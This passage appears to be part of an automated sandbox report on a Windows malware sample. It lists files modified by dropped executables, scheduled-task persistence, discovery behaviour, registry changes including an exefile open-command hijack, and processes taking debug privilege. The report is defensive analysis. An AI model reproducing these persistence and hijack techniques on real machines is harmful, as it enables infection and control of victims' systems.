File opened for modification C:\PROGRA~2\WINDOW~2\wab.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmlaunch.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{D87AE~1\WINDOW~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmpshare.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~4.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ExtExport.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ieinstal.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WI8A19~1\ImagingDevices.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOBD5D~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmlaunch.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MOZILL~1\UNINST~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{EF5AF~1\WINDOW~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\DISABL~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\setup_wm.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\INTERN~1\iexplore.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmprph.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\msedge.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmplayer.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\WI8A19~1\ImagingDevices.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~2\wab.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmprph.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~3.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~2.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~4.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{63880~1\WINDOW~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmpconfig.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmpshare.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\iexplore.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~2.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MID1AD~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File opened for modification C:\Windows\directx.sys C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\Logs\DirectX.log C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\axplong.job C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\axplong.job C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File created C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\Files\m.exe N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Embeds OpenSSL

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe
N/A N/A N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\322341857.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\m.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Ammyy C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Ammyy\Admin C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin\hr3 = 4893cd9e8c781441d2a92a7b5f9b3a11bcd37e7e8b8558b059dd60b2da38f1eabdd7394eaa42eb3d1544382cfd1289e9db5f55de50061d9d0541e26e5bf6c9db8fb7162a0fcbb7c53daeac C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\2946613613.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2946613613.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\client.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\SubDir\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2946613613.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE N/A
